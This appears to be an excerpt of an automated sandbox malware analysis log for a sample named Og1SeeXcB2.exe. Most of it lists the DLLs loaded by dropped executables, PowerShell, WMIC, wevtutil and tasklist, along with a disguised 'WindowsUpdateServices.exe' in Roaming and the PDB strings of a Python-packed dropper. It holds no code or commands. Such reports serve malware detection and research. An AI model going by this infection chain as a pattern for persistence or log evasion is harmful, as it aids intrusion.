                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: bcp47mrm.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: wevtapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sqlite3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\wsruwii | Window detected: Number of UI elements: 13
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\ComputerDefaults.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: Og1SeeXcB2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DE5A.exe, 00000016.00000002.2478711544.00007FFE1A4F1000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
